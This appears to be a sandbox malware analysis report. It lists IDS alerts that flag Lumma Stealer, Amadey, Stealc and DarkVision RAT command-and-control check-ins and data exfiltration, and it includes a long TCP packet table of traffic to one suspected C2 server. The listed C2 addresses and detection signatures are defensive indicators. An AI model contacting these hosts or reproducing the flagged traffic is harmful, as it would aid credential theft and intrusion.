2024-12-08T19:53:51.808385+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49893	104.21.16.9	443	TCP
2024-12-08T19:53:52.101941+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49894	154.216.20.243	443	TCP
2024-12-08T19:53:52.106991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49895	154.216.20.243	443	TCP
2024-12-08T19:53:52.224640+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49896	185.215.113.43	80	TCP
2024-12-08T19:53:53.308915+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.4	49895	154.216.20.243	443	TCP
2024-12-08T19:53:53.548873+0100	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	1	154.216.20.243	443	192.168.2.4	49895	TCP
2024-12-08T19:53:53.614388+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49907	185.157.162.216	5200	TCP
2024-12-08T19:53:54.004492+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49904	185.215.113.16	80	TCP
2024-12-08T19:53:54.364287+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49906	104.21.16.9	443	TCP
2024-12-08T19:53:54.364287+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49906	104.21.16.9	443	TCP
2024-12-08T19:53:57.309649+0100	2045619	ET MALWARE Win32/DarkVision RAT CnC Checkin M3	1	192.168.2.4	49907	185.157.162.216	5200	TCP
2024-12-08T19:53:58.697314+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49920	154.216.20.243	443	TCP
2024-12-08T19:53:59.288077+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-08T19:53:59.308541+0100	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.4	53460	1.1.1.1	53	UDP
2024-12-08T19:53:59.757259+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49934	185.157.162.216	5200	TCP
2024-12-08T19:53:59.937781+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49922	185.215.113.43	80	TCP
2024-12-08T19:54:00.398859+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49929	104.21.16.9	443	TCP
2024-12-08T19:54:00.398859+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49929	104.21.16.9	443	TCP
2024-12-08T19:54:00.792515+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:00.792515+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:00.991585+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49933	154.216.20.243	443	TCP
2024-12-08T19:54:01.494013+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49936	185.215.113.16	80	TCP
2024-12-08T19:54:01.948881+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:01.948881+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49932	104.21.16.9	443	TCP
2024-12-08T19:54:02.309645+0100	2044697	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3	1	192.168.2.4	49937	154.216.20.243	443	TCP
2024-12-08T19:54:02.614377+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49945	185.157.162.216	5200	TCP
2024-12-08T19:54:03.138854+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49944	154.216.20.243	443	TCP
2024-12-08T19:54:03.857742+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:03.857742+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:04.150275+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49948	104.21.16.9	443	TCP
2024-12-08T19:54:04.150275+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49948	104.21.16.9	443	TCP
2024-12-08T19:54:04.594337+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:04.594337+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49946	104.21.16.9	443	TCP
2024-12-08T19:54:05.358627+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49961	185.157.162.216	5200	TCP
2024-12-08T19:54:05.667544+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49954	154.216.20.243	443	TCP
2024-12-08T19:54:08.131943+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49985	185.157.162.216	5200	TCP
2024-12-08T19:54:09.843192+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49989	104.21.16.9	443	TCP
2024-12-08T19:54:09.843192+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49989	104.21.16.9	443	TCP
2024-12-08T19:54:10.139396+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49984	185.215.113.206	80	TCP
2024-12-08T19:54:11.294133+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	50005	185.157.162.216	5200	TCP
2024-12-08T19:54:30.590415+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	50045	104.21.16.9	443	TCP
2024-12-08T19:54:30.590415+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50045	104.21.16.9	443	TCP
2024-12-08T19:54:31.450814+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50045	104.21.16.9	443	TCP
2024-12-08T19:54:31.450814+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50045	104.21.16.9	443	TCP
2024-12-08T19:54:37.063316+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	50061	104.21.16.9	443	TCP
2024-12-08T19:54:37.063316+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50061	104.21.16.9	443	TCP
2024-12-08T19:54:37.813764+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50061	104.21.16.9	443	TCP
2024-12-08T19:54:37.813764+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50061	104.21.16.9	443	TCP
2024-12-08T19:54:42.232297+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50069	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2024 19:52:02.002743006 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:02.123522043 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:02.123645067 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:02.131928921 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:02.251333952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:03.254729986 CET	49675	443	192.168.2.4	173.222.162.32
Dec 8, 2024 19:52:03.456253052 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:03.456420898 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:03.458870888 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:03.579251051 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:03.930253029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:03.930341005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:03.931476116 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.051060915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.418545961 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.418612957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.418649912 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.418690920 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.430576086 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.552273989 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872602940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872641087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872652054 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872668982 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.872699022 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.872720957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872736931 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872762918 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.872797966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.872819901 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872869968 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:04.872874975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.872912884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:04.881257057 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:05.001348972 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.321135044 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.321232080 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:05.338324070 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:05.338376999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:05.457825899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.457839012 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.457849979 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.457936049 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.458067894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.458084106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.458219051 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:05.458271027 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:06.429753065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:06.429910898 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:06.702727079 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:06.822772026 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.142388105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.142412901 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.142481089 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.144311905 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.144349098 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.144380093 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.144421101 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.152244091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.152298927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.152370930 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.152407885 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.159632921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.159713030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.159742117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.159782887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.168278933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.168301105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.168339014 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.168359995 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.176700115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.176784039 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.176821947 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.176861048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.269577026 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.269603014 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.269669056 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.270509958 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.273401022 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.273458958 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.273471117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.273509979 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.279467106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.279546976 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.279592037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.279634953 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.287691116 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.287761927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.287789106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.287827969 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.295650959 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.295721054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.295726061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.295787096 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.332532883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.332576990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.332607985 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.332632065 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.336596966 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.336662054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.338123083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.338184118 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.338218927 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.338258982 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.346647024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.346731901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.346766949 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.346837044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.355047941 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.355115891 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.355169058 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.355218887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.363460064 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.363504887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.363537073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.363574028 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.371722937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.371784925 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.371911049 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.371957064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.380541086 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.380604982 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.392157078 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.392205000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.392226934 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.392267942 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.396028042 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.396076918 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.396151066 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.396193981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.401482105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.401525021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.401568890 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.401613951 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.401626110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.409914017 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.409979105 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.410072088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.410111904 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.418549061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.418591976 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.418670893 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.418705940 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.461397886 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.461457968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.461502075 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.461563110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.464571953 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.464622021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.464652061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.464709044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.471010923 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.471072912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.471107960 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.471148968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.477499008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.477541924 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.477588892 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.477631092 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.483227015 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.483279943 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.483345032 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.483386993 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.489626884 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.489682913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.489756107 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.489793062 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.495922089 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.495978117 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.496004105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.496043921 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.502199888 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.502279043 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.502304077 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.502346992 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.508568048 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.508622885 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.508651018 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.508692026 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.524790049 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.524852037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.524878025 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.524924040 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.526341915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.526393890 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.526477098 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.526516914 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.529633999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.529706001 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.530828953 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.530873060 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.530904055 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.530955076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.534176111 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.534223080 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.534315109 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.534353971 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.537444115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.537492037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.537523985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.537566900 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.540771008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.540838003 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.540860891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.540920973 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.544055939 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.544105053 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.544141054 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.544181108 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.547462940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.547528982 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.547604084 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.547657967 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.550954103 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.550996065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.551018000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.551042080 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.553922892 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.553965092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.553982019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.554007053 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.557343960 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.557399988 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.557431936 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.557472944 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.560420036 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.560477018 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.585608006 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.585668087 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.585700989 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.585748911 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.586601019 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.586647987 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.586699963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.586739063 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.589915037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.589975119 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.590063095 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.590106010 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.593337059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.593373060 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.593403101 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.593426943 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.596591949 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.596611023 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:07.596653938 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.596668005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:07.657299042 CET	80	49730	185.215.113.206	192.168.2.4
